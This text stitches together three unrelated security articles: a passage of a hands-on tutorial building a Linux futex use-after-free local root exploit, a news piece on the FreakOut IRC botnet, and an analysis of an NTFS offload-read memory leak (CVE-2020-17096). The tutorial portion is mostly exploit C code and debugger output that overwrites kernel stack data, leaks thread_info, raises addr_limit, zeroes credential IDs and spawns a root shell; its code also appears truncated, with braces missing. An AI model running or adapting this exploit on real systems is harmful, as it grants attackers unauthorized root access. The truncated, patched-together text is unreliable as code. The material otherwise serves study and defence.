rt_mutex_top_waiter(struct rt_mutex *lock)
	struct rt_mutex_waiter *w;

	w = plist_first_entry(&lock->wait_list, struct rt_mutex_waiter,
	BUG_ON(w->lock != lock); // <-- KERNEL BUG

	return w;

The function compares the lock that the top waiter claims it waits on to the actual lock. Because the waiter is completely bugged, it’s lock member no longer points to the relating rt_mutex and therefore causes a crash.

Privilege Escalation

DOSing the system is pretty cool, but let’s make it more interesting by escalating to root privileges.

I intetionally do not post the entire exploit in advance because that would most likely be too overwhelming. Instead, I’ll append code blocks by stages.
If you do prefer to have the entire exploit available in hand, it can be found here.

Writing To The Waiter

In order to make use of our dangling waiter, we’d first need to find a way to write to it.
A quick reminder, our waiter is placed on the kernel stack. With that in mind, we need to somehow be able to write a controlled buffer to the place the waiter was held within the stack. Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing System Calls.

But how do we know which syscall to invoke?
Luckily for us, the kernel comes with a useful tool called checkstack.
It can be found within the source under scripts/

$ objdump -d vmlinux | ./scripts/ i386 | grep -E "(futex_wait_requeue_pi|sys)"

0xc11206e6 do_sys_poll [vmlinux]:                       932
0xc1120aa3 do_sys_poll [vmlinux]:                       932
0xc1527388 ___sys_sendmsg [vmlinux]:                    248
0xc15274d8 ___sys_sendmsg [vmlinux]:                    248
0xc1527b1a ___sys_recvmsg [vmlinux]:                    220
0xc1527c6b ___sys_recvmsg [vmlinux]:                    220
0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1529828 __sys_sendmmsg [vmlinux]:                    184
0xc15298fe __sys_sendmmsg [vmlinux]:                    184

The script lists the stack depth, size of stack frame, of each function within the kernel. This would help us in estimating which syscall we should use in order to write to the waiter’s address space.

We enforce two limitations on the system call we’re looking for.

  1. It is deep enough in order to overlap with our dangling rt_waiter.
  2. The local variable within the function that overlaps rt_waiter is controllable.

The syscalls sendmsgrecvmsg, and sendmmsg are the adjacent functions to futex_wait_requeue_pi in terms of stack usage.
That should be a good place to start. We’ll be using sendmmsg throughout the exploit.

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285

(gdb) set $waiter = &rt_waiter

Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979

(gdb) p $waiter
$12 = (struct rt_mutex_waiter *) 0xc78cbe2c

(gdb) p &iovstack
$11 = (struct iovec (*)[8]) 0xc78cbe08

(gdb) p sizeof(iovstack)
$13 = 0x40

(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)
$14 = 0x1 (True)

I set two breakpoints, at futex_wait_requeue_pi() and ___sys_sendmsg() in order to understand what arguments should we pass to the sendmmsg syscall so that rt_waiter is under our control.

When the breakpoint hits on futex_wait_requeue_pi(), I do nothing besides storing the address of rt_waiter in $waiter. When it hits on ___sys_sendmsg(), I check for the address of the local variable iovstack, which is of type struct iovec[8], and examine its size.

iovstack0xc78cbe08 — 0xc78cbe48

Proved futex_wait_requeue_pi:rt_waiter overlaps with ___sys_sendmsg:iovstack.

Let’s take a look at sendmmsg’s signature.

int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,
                    int flags);

struct mmsghdr
	struct msghdr msg_hdr;
	unsigned int msg_len;

struct msghdr
	void *msg_name;
	socklen_t msg_namelen;
	struct iovec *msg_iov; // <-- iovstack
	size_t msg_iovlen;
	void *msg_control;
	size_t msg_controllen;
	int msg_flags;

struct iovec
	void *iov_base;
	size_t iov_len;

At this point I suggest understanding the syscall itself.

The sendmmsg() system call is an extension of sendmsg(2) that allows the caller to transmit multiple messages on a socket using a single system call. (This has performance benefits for some applications.)

The arguments are pretty trivial and essentially the same as sendmsg only that there’s mmsghdr that can contain multiple msghdr.
If you’re unfamiliar with the syscall, give it a read at man sendmmsg(2).

In order to invoke sendmmsg successfully, we’d need a pair of connected sockets that we can send the data to. It is very important to understand that we want ___sys_sendmsg() to block so that we can take advantage of the waiter’s corrupted state while it’s under our control.

Typically, the function sends the data over the socket and exits. In order to make it block, we’d need to use SOCK_STREAM as our socket type which provides a reliable connection-based byte stream. This grants us the blocking capabilities we’ve talked about. On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.

I’ve crafted a function that does just that.


int client_sockfd, server_sockfd;

void setup_sockets()
    int fds[2];

    puts(USERLOG "Creating a pair of sockets for kernel stack modification using blocking I/O.");

    assert(!socketpair(AF_UNIX, SOCK_STREAM, 0, fds));

    client_sockfd = fds[0];
    server_sockfd = fds[1];

    while (send(client_sockfd, BLOCKBUF, BLOCKBUFLEN, MSG_DONTWAIT) != -1)
    assert(errno == EWOULDBLOCK);

The function creates a pair of UNIX sockets of type SOCK_STREAM and then sends AAAAAAAA over the socket untill the call to send fails with EWOULDBLOCK as the errno. Note the MSG_DONTWAIT flag that makes the send return immediately instead of blocking.

Enables nonblocking operation; if the operation would block, EAGAIN or EWOULDBLOCK is returned.

Afterwards we assert that EWOULDBLOCK is in fact the reason the operation failed.

Next up, we’re ready for actually invoking our sendmmsg to overwrite rt_waiter. Exciting!

For the sake of overwriting the waiter’s list entries properly, which is what we’re interested in, we’d need to align the iovstack in kernelspace, which is the iovec in userspace accordingly.

#define COUNT_OF(arr) (sizeof(arr) / sizeof(arr[0]))

struct mmsghdr msgvec;
struct iovec msg[7];

void setup_msgs()
    int i;

    for (i = 0; i < COUNT_OF(msg); i++)
        msg[i].iov_base = 0x41414141;
        msg[i].iov_len = 0xace;
    msgvec.msg_hdr.msg_iov = msg;
    msgvec.msg_hdr.msg_iovlen = COUNT_OF(msg);

In this function I setup the messages, the iovec, in the hope that it would overwrite the waiter’s struct once I call sendmmsg. Once again, I’ve placed two breakpoints at futex_wait_requeue_pi() and ___sys_sendmsg().

Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
    abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
(gdb) cont

Breakpoint 3, ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979

(gdb) fin
Run till exit from #0  ___sys_sendmsg (sock=sock@entry=0xc5dfda80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cfef4,
    flags=flags@entry=0x0, used_address=used_address@entry=0xc78cff10) at net/socket.c:1979
Program received signal SIGINT, Interrupt.
(gdb) p *$waiter
$26 = {
  list_entry = {
    prio = 0xace,
    prio_list = {
      next = 0x41414141,
      prev = 0xace
    node_list = {
      next = 0x41414141,
      prev = 0xace

There are many interesting things to look at from this experiment. Let’s go over it.

Just as before, I store rt_waiter’s address. Upon ___sys_sendmmsg I continue the execution until the function is about to exit. However, because the function is blocking, I have to interrupt the debugger with a ^C. Once the function blocks, it had already filled the iovstack. After I do that, I browse the waiter struct and I see that the overwrite occured just as I wanted it to.

Waiter Overwritten Image

(In reality there’s only a single waiter)

That’s great! We can now overwrite the dangling waiter’s memory.

Let’s review this as a whole within the the exploit code.

void *forge_waiter(void *arg)
    puts(USERLOG "Placing the fake waiter on the dangling node within the mutex's waiters list.");

    assert(!fwait_requeue(&non_pi_futex, &pi_futex, 0));
    assert(!sendmmsg(client_sockfd, &msgvec, 1, 0));

int main()
    pthread_t forger, ref_holder;


    assert(!pthread_create(&forger, NULL, forge_waiter, NULL));

    assert(frequeue(&non_pi_futex, &pi_futex, 1, 0) == 1);

    assert(!pthread_create(&ref_holder, NULL, lock_pi_futex, NULL));

    pi_futex = 0;
    frequeue(&pi_futex, &pi_futex, 1, 0);

We’ve already reviewed setup_msg()setup_sockets(), and fwait_requeue() would block until the self-requeue is triggered. First thing when it exits, sendmmsg() is called to overwrite the waiter, which also blocks.

You could see that I create another thread called ref_holder which also attempts to lock pi_futex which in turns forms another waiter instance. The reason this is needed is because the state of the futex would get destroyed if there aren’t any contending waiters on the lock.

Kernel Infoleak

Our next goal would be to leak an address that would help us target the task_struct of our process which contains its cred so that we can overwrite it later to gain root privileges.

The way we go about doing it is using a fake waiter and when we’d attempt to lock the futex once again, another waiter would be added to the waiters list which would result in writing to the adjacent nodes which would be under our control. Once that happens, we’d be able to inspect the kernel address from userspace via the fake waiter list nodes.

#define DEFAULT_PRIO 120
#define THREAD_INFO_BASE 0xffffe000

struct rt_mutex_waiter fake_waiter, leaker_waiter;
pthread_t corrupter;

void link_fake_leaker_waiters()
    fake_waiter.list_entry.node_list.prev = &leaker_waiter.list_entry.node_list;
    fake_waiter.list_entry.prio_list.prev = &leaker_waiter.list_entry.prio_list;
    fake_waiter.list_entry.prio = DEFAULT_PRIO + 1;

void leak_thread_info()
    assert(!pthread_create(&corrupter, NULL, lock_pi_futex, NULL));

    corrupter_thread_info = (struct thread_info *)((unsigned int) & THREAD_INFO_BASE);
    printf(USERLOG "Corrupter's thread_info @ %p\n", corrupter_thread_info);

Let’s first address what’s called a “Thread Info”.
thread_info is a thread descriptor that is held within the kernel and is placed on the stack’s address space. For each thread that we create using pthread_create() a new thread_info is generated in the kernel.

struct thread_info {
	struct task_struct	*task;		/* main task structure */
	struct exec_domain	*exec_domain;	/* execution domain */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	int			preempt_count;	/* 0 => preemptable,
						   <0 => BUG */
	mm_segment_t		addr_limit;
	struct restart_block    restart_block;
	void __user		*sysenter_return;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */

The reason it interests us is because it’s relatively easy to get its address once you have a leak, and the more interesting reason is that it contains a pointer to the process’ task_struct. Just to clarify, a new task_struct is also created for each thread.

In order to do the actual leak, we link together two fake waiters. One is named fake_waiter which is used for general list corruption, and the other is called leaker_waiter because its sole usage is to leak addresses through.

By linking I mean in practice that we set the previous node of the fake_waiter to be the leaker_waiter, and set its priority to be the default priority of a task plus one so that it’ll place itself after the leaker_waiter. Priority is a value that correlates to the process’ niceness.

Crafted Waiter Image

Those aren’t the actual priorities but the idea remains.

After we’ve linked the waiters in userspace, we call lock_pi_futex() on another thread so that a waiter is created which attempts to add itself into the list. Naturally, once a node is added into a list, it writes to its adjacent nodes, in our case to leaker_waiter.

New Waiter Image

Awesome! We’ve leaked a kernel stack address of one of the threads in our program.

In order to target its thread_info, all we have to do is AND its address with THREAD_INFO_BASE. You can see that from current_thread_info()’s implementation, though that might vary across different architectures. Here’s the source for x86.

/* how to get the thread information struct from C */
static inline struct thread_info *current_thread_info(void)
	return (struct thread_info *)
		(current_stack_pointer & ~(THREAD_SIZE - 1));

We have a hold of the thread_info location in memory.

Overwriting Address Limit

Just as we can read by corrupting the list, we can utilize the same technique in order to use it for writing purposes. The first memory area that we’ll be targeting is what’s called the “Address Limit”.

It lays under thread_info.addr_limit as you can see in thread_info above. It is used for limiting the virtual address space that is reserved for the user. When the kernel works with user-provided addresses, it compares them to the thread’s addr_limit in order to verify that it’s a valid userspace address. If the supplied address is smaller than addr_limit, the designated memory area is in fact from userspace.

The addr_limit is an excellent target for initial kernel overwrite because once you overwrite it with 0xffffffff, you have gotten full arbitrary read and write capabilities to kernel memory.

void kmemcpy(void *src, void *dst, size_t len)
    int pipefd[2];

    assert(write(pipefd[1], src, len) == len);
    assert(read(pipefd[0], dst, len) == len);

void escalate_priv_sighandler()
    struct task_struct *corrupter_task, *main_task;
    struct cred *main_cred;
    unsigned int root_id = 0;
    void *highest_addr = (void *)-1;
    unsigned int i;

    puts(USERLOG "Escalating main thread's privileges to root.");

    kmemcpy(&highest_addr, &corrupter_thread_info->addr_limit, sizeof(highest_addr));
    printf(USERLOG "Written 0x%x to addr_limit.\n", -1);

    kmemcpy(&corrupter_thread_info->task, &corrupter_task, sizeof(corrupter_thread_info->task));
    printf(USERLOG "Corrupter's task_struct @ %p\n", corrupter_task);

    kmemcpy(&corrupter_task->group_leader, &main_task, sizeof(corrupter_task->group_leader));
    printf(USERLOG "Main thread's task_struct @ %p\n", main_task);

    kmemcpy(&main_task->cred, &main_cred, sizeof(main_task->cred));
    printf(USERLOG "Main thread's cred @ %p\n", main_cred);

    for (i = 0; i < COUNT_OF(main_cred->ids); i++)
        kmemcpy(&root_id, &main_cred->ids[i], sizeof(root_id));

    puts(USERLOG "Escalated privileges to root successfully.");

void escalate_priv()
    pthread_t addr_limit_writer;

    struct sigaction sigact = {.sa_handler = escalate_priv_sighandler};
    assert(!sigaction(SIGINT, &sigact, NULL));
    puts(USERLOG "Registered the privileges escalator signal handler for interrupting the corrupter thread.");

    fake_waiter.list_entry.prio_list.prev = (struct list_head *)&corrupter_thread_info->addr_limit;
    assert(!pthread_create(&addr_limit_writer, NULL, lock_pi_futex, NULL));

    pthread_kill(corrupter, SIGINT);

After we’ve executed leak_thread_info(), we’re going to call escalate_priv(). The first thing that it does is register escalate_priv_sighandler as the SIGINT signal handler using the sigaction() syscall.

Let’s briefly mention what signal handlers are and why do we use them. A signal handler is a function that is called by the target environment when the corresponding signal occurs. The target environment suspends execution of the program until the signal handler returns.

This mechanism allows us to interrupt the process’ job in order to perform some other work. In our case, we’d like to form the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation because otherwise our arrangement would be overwritten, but if you block you can’t exploit the stack’s state.

That’s why signal are needed and why they’re used in our scenario. They allow us to execute code within the process’ context outside its normal execution flow.

I’m reminding you that when talking about pthreads, all the signal handlers are shared with the parent process, that is because internally pthreads passes both CLONE_THREAD | CLONE_SIGHAND flags when it creates the child process with clone().

The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.

Afterwards, we’re going to place the address that we want to write to, that is &corrupter_thread_info->addr_limit, as the fake waiter’s previous node. Once we’ll attempt to lock the futex, the newly created waiter would write its own address to the addr_limit. Not yet something that we can control, but rather a value that is guaranteed to be bigger than the current one because addr_limit is at the bottom-most of the virtual address space.

Now we’ve arrived to a scenario where addr_limit > &addr_limit is surely true. Once this is condition is met, we can simply write to addr_lmit once again on our own! This is where the signaling come into play, and specifically the escalate_priv_sighandler from earlier.

Because each thread has its own thread_info, which in turn means that each thread also has its own addr_limit, we’d need a way to interrupt the specific thread whose addr_limit we’ve overwritten. Therefore, after we’ve “increased” the address limit, only that thread would be able to utilize and exploit this feature. This is where we signal the addr_limit_writer thread using pthread_kill() which triggers the execution of escalate_priv_sighandler.

What this function does is read and write to different areas in kernel memory. In order to do it, I wrote a small helper function called kmemcpy(). It exploits the fact that addr_limit had been overwritten, it creates a pipe which it reads from and writes to. The read() and write() syscalls internally invoke copy_from_user() and copy_to_user() within the kernel which do the checks according to addr_limit.

unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
	if (access_ok(VERIFY_READ, from, n)) // <-- addr_limit comparison
		n = __copy_from_user(to, from, n);
		memset(to, 0, n);
	return n;

unsigned long
copy_to_user(void __user *to, const void *from, unsigned long n)
	if (access_ok(VERIFY_WRITE, to, n)) // <-- addr_limit comparison
		n = __copy_to_user(to, from, n);
	return n;

#define access_ok(type, addr, size) \
	(likely(__range_not_ok(addr, size, user_addr_max()) == 0))

#define user_addr_max() (current_thread_info()->addr_limit.seg)

At the signal handler several operations are done.

  1. Cancel the address space access limitation by setting addr_limit to the highest value possible.
  2. Read the task_struct pointer of the corrupted thread.
  3. Read the parent’s task_struct pointer from the corrupted thread’s task_struct via the group_leader member which points to it.
  4. Read the cred struct pointer from the parent’s task_struct.
  5. Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main cred struct.

Popping Shell

Now all that’s left to do is system("/bin/sh") on the main thread to drop a shell.
Because the child process inherits the cred struct, the shell will also be in root permissions.


This has been a lot of fun, and I’ve learned so much on the way.
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards. At the end, the exploit seems relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.
Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

Original text by Ravie Lakshmanan

An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.

The attacks deploy a new malware variant called «FreakOut» by leveraging critical flaws fixed in Laminas Project (formerly Zend Framework) and Liferay Portal as well as an unpatched security weakness in TerraMaster, according to Check Point Research’s new analysis published today and shared with The Hacker News.

Attributing the malware to be the work of a long-time cybercrime hacker — who goes by the aliases Fl0urite and Freak on HackForums and Pastebin at least since 2015 — the researchers said the flaws — CVE-2020-28188CVE-2021-3007, and CVE-2020-7961 — were weaponized to inject and execute malicious commands in the server.

Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named «» using Python 2, which reached end-of-life last year — implying that the threat actor is banking on the possibility that that victim devices have this deprecated version installed.

«The malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script which contains polymorphic code, with the obfuscation changing each time the script is downloaded,» the researchers said, adding the first attack attempting to download the file was observed on January 8.

And indeed, three days later, cybersecurity firm F5 Labs warned of a series of attacks targeting NAS devices from TerraMaster (CVE-2020-28188) and Liferay CMS (CVE-2020-7961) in an attempt to spread N3Cr0m0rPh IRC bot and Monero cryptocurrency miner.

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel to execute malicious commands.

In FreakOut’s case, the compromised devices are configured to communicate with a hardcoded command-and-control (C2) server from where they receive command messages to execute.

The malware also comes with extensive capabilities that allow it to perform various tasks, including port scanning, information gathering, creation and sending of data packets, network sniffing, and DDoS and flooding.

Furthermore, the hosts can be commandeered as a part of a botnet operation for crypto-mining, spreading laterally across the network, and launching attacks on outside targets while masquerading as the victim company.

With hundreds of devices already infected within days of launching the attack, the researchers warn, FreakOut will ratchet up to higher levels in the near future.

For its part, TerraMaster is expected to patch the vulnerability in version 4.2.07. In the meantime, it’s recommended that users upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later and laminas-http 2.14.2 to mitigate the risk associated with the flaws.

«What we have identified is a live and ongoing cyber attack campaign targeting specific Linux users,» said Adi Ikan, head of network cybersecurity Research at Check Point. «The attacker behind this campaign is very experienced in cybercrime and highly dangerous.»

«The fact that some of the vulnerabilities exploited were just published, provides us all a good example for highlighting the significance of securing your network on an ongoing basis with the latest patches and updates.»

NTFS Remote Code Execution (CVE-2020-17096) Analysis

NTFS Remote Code Execution (CVE-2020-17096) Analysis

Original text by zecops

This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. The remote code execution vulnerability assessed with Exploitation: “More Likely”,  grabbed our attention among the last Patch Tuesday fixes.

Diffing ntfs.sys

Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.

Diffing ntfs sys

The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:

BinDiff - NtfsOffloadRead

Triggering the vulnerable code

From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.

Indeed, by issuing the FSCTL_OFFLOAD_READ control code we’ve seen that the NtfsOffloadRead function is being called, but the first if branch is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.

Exploring exploitation options

We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.

  • First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.

    Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it’s being ignored. Otherwise, the numerous fields of the IrpContext structure are being freed using functions such as ExFreePoolWithTag. The code is rather long and we didn’t analyze it thoroughly, but from a quick glance we didn’t find a way to misuse the fact that those functions aren’t being called in the vulnerable version. We observed, thought, that the bug causes a memory leak in the non-paged pool which is guaranteed to reside in physical memory.

    We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.
  • Second change: An IRP pointer field, part of IrpContex, was set to NULL.

    From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.

What about remote code execution?

We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.

It is possible that there’s no actual remote code execution here, and it was marked as such just in case, as it happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.

CVE-2020-17096 POC (Denial of Service)

Before. An idle VM with a standard configuration and no running programs.

After. The same idle VM after triggering the memory leak, unresponsive.

C# code that causes the memory leak and the eventual denial of service. Was used with the Windows Protocol Test Suites.